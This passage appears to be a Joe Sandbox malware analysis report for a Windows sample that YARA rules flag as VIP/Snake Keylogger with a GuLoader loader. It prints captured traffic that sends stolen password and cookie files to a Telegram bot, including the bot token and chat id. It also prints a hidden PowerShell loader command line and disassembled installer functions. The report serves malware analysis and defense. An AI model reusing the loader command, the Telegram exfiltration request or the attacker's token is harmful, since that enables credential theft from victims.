30 2f 30 31 2f 32 30 32 35 20 2f 20 31 31 3a 31 37 Data Ascii: --------------------------8dd32380b8cca17Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:390120Date and Time: 10/01/2025 / 11:17
2025-01-10 16:17:52 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 16:17:52 GMT Content-Type: application/json Content-Length: 539 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 16:17:52 UTC	539	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 36 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 38 38 39 38 33 32 33 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 68 65 63 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 68 65 63 68 6c 6c 6f 79 64 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 38 31 35 30 30 32 32 36 31 32 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 48 45 43 48 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4c 4c 4f 59 44 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 48 45 43 48 5f 4c 4c 4f 59 44 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 32 35 38 37 32 2c 22 64 6f 63 Data Ascii: {"ok":true,"result":{"message_id":164,"from":{"id":7888983233,"is_bot":true,"first_name":"Chech","username":"Chechlloydbot"},"chat":{"id":8150022612,"first_name":"CHECH","last_name":"LLOYD","username":"CHECH_LLOYD","type":"private"},"date":1736525872,"doc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	59391	149.154.167.220	443	7864	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 16:17:54 UTC	358	OUT	POST /bot7888983233:AAGHDGX41oFk6oqVx8IC3EbSn56Cf9Te8YI/sendDocument?chat_id=8150022612&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd3255c2e76ef6 Host: api.telegram.org Content-Length: 1282
2025-01-10 16:17:54 UTC	1282	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 32 35 35 63 32 65 37 36 65 66 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 43 6f 6f 6b 69 65 73 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 33 39 30 31 32 30 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 Data Ascii: --------------------------8dd3255c2e76ef6Content-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies \| user \| VIP Recovery PC Name:390120Date and Time: 10/01/20
2025-01-10 16:17:55 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 16:17:55 GMT Content-Type: application/json Content-Length: 550 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 16:17:55 UTC	550	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 36 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 38 38 39 38 33 32 33 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 68 65 63 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 68 65 63 68 6c 6c 6f 79 64 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 38 31 35 30 30 32 32 36 31 32 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 48 45 43 48 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4c 4c 4f 59 44 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 48 45 43 48 5f 4c 4c 4f 59 44 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 32 35 38 37 35 2c 22 64 6f 63 Data Ascii: {"ok":true,"result":{"message_id":165,"from":{"id":7888983233,"is_bot":true,"first_name":"Chech","username":"Chechlloydbot"},"chat":{"id":8150022612,"first_name":"CHECH","last_name":"LLOYD","username":"CHECH_LLOYD","type":"private"},"date":1736525875,"doc

Target ID:	1
Start time:	11:15:13
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\r5yYt97sfB.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\r5yYt97sfB.exe"
Imagebase:	0x400000
File size:	789'552 bytes
MD5 hash:	831A8A58088361D324C958970B8ED79C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	11:15:16
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -windowstyle hidden "$Forebrace7=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Dipterologist.Fra';$Afskalning=$Forebrace7.SubString(15810,3);.$Afskalning($Forebrace7) "
Imagebase:	0x5e0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	11:15:17
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	11:17:05
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x3a0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000B.00000002.3827428231.0000000025EEE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000B.00000002.3827428231.0000000025EEE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.3827428231.0000000025D01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000B.00000002.3798575873.00000000043F8000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	23.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21.4%
Total number of Nodes:	1357
Total number of Limit Nodes:	45

Executed Functions

Function 004033B6 Relevance: 91.4, APIs: 32, Strings: 20, Instructions: 401
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 004033D8
GetVersion.KERNEL32 ref: 004033DE
#17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040342E
OleInitialize.OLE32(00000000), ref: 00403435
SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 00403451
GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 00403466
GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\r5yYt97sfB.exe",00000000), ref: 00403479
CharNextW.USER32(00000000,"C:\Users\user\Desktop\r5yYt97sfB.exe",00000020), ref: 004034A0

Part of subcall function 00406559: GetModuleHandleA.KERNEL32(?,?,00000020,00403422,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040656B
Part of subcall function 00406559: GetProcAddress.KERNEL32(00000000,?), ref: 00406586

GetTempPathW.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\), ref: 004035DB
GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB), ref: 004035EC
lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 004035F8
GetTempPathW.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 0040360C
lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low), ref: 00403614
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low), ref: 00403625
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\), ref: 0040362D
DeleteFileW.KERNELBASE(1033), ref: 00403641

Part of subcall function 00406183: lstrcpynW.KERNEL32(0040A230,0040A230,00000400,00403466,00429260,NSIS Error), ref: 00406190

OleUninitialize.OLE32(?), ref: 0040370C
ExitProcess.KERNEL32 ref: 0040372E
lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\r5yYt97sfB.exe",00000000,?), ref: 00403741
lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,0040A328,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\r5yYt97sfB.exe",00000000,?), ref: 00403750
lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\r5yYt97sfB.exe",00000000,?), ref: 0040375B
lstrcmpiW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\r5yYt97sfB.exe",00000000,?), ref: 00403767
SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\), ref: 00403783
DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 004037DD
CopyFileW.KERNEL32(C:\Users\user\Desktop\r5yYt97sfB.exe,00420F08,00000001), ref: 004037F1
CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 0040381E
GetCurrentProcess.KERNEL32(00000028,?), ref: 0040384D
OpenProcessToken.ADVAPI32(00000000), ref: 00403854
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403869
AdjustTokenPrivileges.ADVAPI32 ref: 0040388C
ExitWindowsEx.USER32(00000002,80040002), ref: 004038B1
ExitProcess.KERNEL32 ref: 004038D4

Strings

.tmp, xrefs: 00403755
"C:\Users\user\Desktop\r5yYt97sfB.exe", xrefs: 0040346C, 00403472, 00403669
TMP, xrefs: 00403628
NSIS Error, xrefs: 00403457
1033, xrefs: 0040363C
~nsu, xrefs: 00403739
\Temp, xrefs: 004035F2
C:\Users\user\Desktop\r5yYt97sfB.exe, xrefs: 004037EC
SeShutdownPrivilege, xrefs: 00403863
TEMP, xrefs: 00403620
SETUPAPI, xrefs: 00403411
UXTHEME, xrefs: 004033FD
C:\Users\user\AppData\Local\magmaet\clenched, xrefs: 004035BE, 004036DE, 00403789, 00403793
C:\Users\user\Desktop, xrefs: 00403760, 00403765, 00403792
C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto, xrefs: 004036E9
Low, xrefs: 0040360E
USERENV, xrefs: 00403407
C:\Users\user~1\AppData\Local\Temp\, xrefs: 004035D0, 004035D5, 004035EB, 004035F7, 00403606, 00403613, 0040361F, 00403627, 0040373E, 0040374F, 0040375A, 00403766, 00403773, 00403782, 00403833
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004033CC
Error launching installer, xrefs: 004036C3

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
String ID: "C:\Users\user\Desktop\r5yYt97sfB.exe"$.tmp$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Local\magmaet\clenched$C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto$C:\Users\user\Desktop$C:\Users\user\Desktop\r5yYt97sfB.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
API String ID: 3586999533-3160581977
Opcode ID: f3ecbdcc9d2ddf88f0db60c94208847800fabd89ade3af92fca17dc4b9b4c2fd
Instruction ID: 382b60f40ca78a79eaa77c6fd6579f97e3273799caf5780a05f3f86dc88dff68
Opcode Fuzzy Hash: f3ecbdcc9d2ddf88f0db60c94208847800fabd89ade3af92fca17dc4b9b4c2fd
Instruction Fuzzy Hash: 1DD11771200300BBD7207F659D09A2B3EADEB4070AF15843FF885B62D2DB7D9956876E

Function 00405421 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040547F
GetDlgItem.USER32(?,000003EE), ref: 0040548E
GetClientRect.USER32(?,?), ref: 004054CB
GetSystemMetrics.USER32(00000002), ref: 004054D2
SendMessageW.USER32(?,00001061,00000000,?), ref: 004054F3
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405504
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405517
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405525
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405538
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040555A
ShowWindow.USER32(?,00000008), ref: 0040556E
GetDlgItem.USER32(?,000003EC), ref: 0040558F
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040559F
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055B8
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055C4
GetDlgItem.USER32(?,000003F8), ref: 0040549D

Part of subcall function 0040427C: SendMessageW.USER32(00000028,?,00000001,004040A8), ref: 0040428A

GetDlgItem.USER32(?,000003EC), ref: 004055E1
CreateThread.KERNELBASE(00000000,00000000,Function_000053B5,00000000), ref: 004055EF
CloseHandle.KERNELBASE(00000000), ref: 004055F6
ShowWindow.USER32(00000000), ref: 0040561A
ShowWindow.USER32(?,00000008), ref: 0040561F
ShowWindow.USER32(00000008), ref: 00405669
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040569D
CreatePopupMenu.USER32 ref: 004056AE
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056C2
GetWindowRect.USER32(?,?), ref: 004056E2
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056FB
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405733
OpenClipboard.USER32(00000000), ref: 00405743
EmptyClipboard.USER32 ref: 00405749
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405755
GlobalLock.KERNEL32(00000000), ref: 0040575F
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405773
GlobalUnlock.KERNEL32(00000000), ref: 00405793
SetClipboardData.USER32(0000000D,00000000), ref: 0040579E
CloseClipboard.USER32 ref: 004057A4

Strings

H7B, xrefs: 0040570F
{, xrefs: 00405687

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: H7B${
API String ID: 590372296-2256286769
Opcode ID: 64a521bccca9f5caed772c9a5003e4b30c68140e3a7fe85c050ebaedb87b4aa9
Instruction ID: 2c7cb92300b087b9ae130e103e133312d6144c84674811722de124f1f1f34f09
Opcode Fuzzy Hash: 64a521bccca9f5caed772c9a5003e4b30c68140e3a7fe85c050ebaedb87b4aa9
Instruction Fuzzy Hash: 16B13770900608FFDF119F60DD899AE7B79FB08354F40847AFA45A62A0CB758E52DF68

Function 004061A5 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(00000000,Completed,?,00405319,Completed,00000000,00000000,00000000), ref: 00406268
GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004062E6
GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 004062F9
SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406335
SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 00406343
CoTaskMemFree.OLE32(?), ref: 0040634E
lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406372
lstrlenW.KERNEL32(: Completed,00000000,Completed,?,00405319,Completed,00000000,00000000,00000000), ref: 004063CC

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 004062B4
\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040636C
Completed, xrefs: 004061CA
: Completed, xrefs: 004061CF, 004062AF, 004062D0, 004062E5, 004062F8, 00406314, 0040633F, 00406371, 00406377, 00406391, 004063A5, 004063C5, 004063CB, 004063D7, 0040640A

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-905382516
Opcode ID: bef7a9cb1f259f829c94a4570d8a9b9bb83f0db893824e0baf2e821e2216e9af
Instruction ID: 0f73e779dd6c4db66e797802c36dad016b528f10de9f6072c808280cb7245e7c
Opcode Fuzzy Hash: bef7a9cb1f259f829c94a4570d8a9b9bb83f0db893824e0baf2e821e2216e9af
Instruction Fuzzy Hash: 9361F271A00105EBDB209F25CD41AAE37A5AF50314F16807FFD46BA2D0D73D89A2CB9D

Function 00405974 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,771B3420,771B2EE0,"C:\Users\user\Desktop\r5yYt97sfB.exe"), ref: 0040599D
lstrcatW.KERNEL32(00425750,\*.*,00425750,?,?,771B3420,771B2EE0,"C:\Users\user\Desktop\r5yYt97sfB.exe"), ref: 004059E5
lstrcatW.KERNEL32(?,0040A014,?,00425750,?,?,771B3420,771B2EE0,"C:\Users\user\Desktop\r5yYt97sfB.exe"), ref: 00405A08
lstrlenW.KERNEL32(?,?,0040A014,?,00425750,?,?,771B3420,771B2EE0,"C:\Users\user\Desktop\r5yYt97sfB.exe"), ref: 00405A0E
FindFirstFileW.KERNEL32(00425750,?,?,?,0040A014,?,00425750,?,?,771B3420,771B2EE0,"C:\Users\user\Desktop\r5yYt97sfB.exe"), ref: 00405A1E
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,Error writing temporary file. Make sure your temp folder is valid.,0000002E), ref: 00405ABE
FindClose.KERNEL32(00000000), ref: 00405ACD

Strings

"C:\Users\user\Desktop\r5yYt97sfB.exe", xrefs: 0040597D
\*.*, xrefs: 004059DF
PWB, xrefs: 004059CD
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00405A5E

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\r5yYt97sfB.exe"$Error writing temporary file. Make sure your temp folder is valid.$PWB$\*.*
API String ID: 2035342205-2467641603
Opcode ID: 03fd1591811734580f28d43f6b2dd8bf165791cda161b7166c14a59216ccda8d
Instruction ID: d49c34b76256c1d29f4337415f4183e275b3e80d30968624801757685f99445f
Opcode Fuzzy Hash: 03fd1591811734580f28d43f6b2dd8bf165791cda161b7166c14a59216ccda8d
Instruction Fuzzy Hash: E041B130A00A14EADB21AB618D89BAF7778DF41764F20427FF805B51D2D77C5982CE6E

Function 00406847 Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
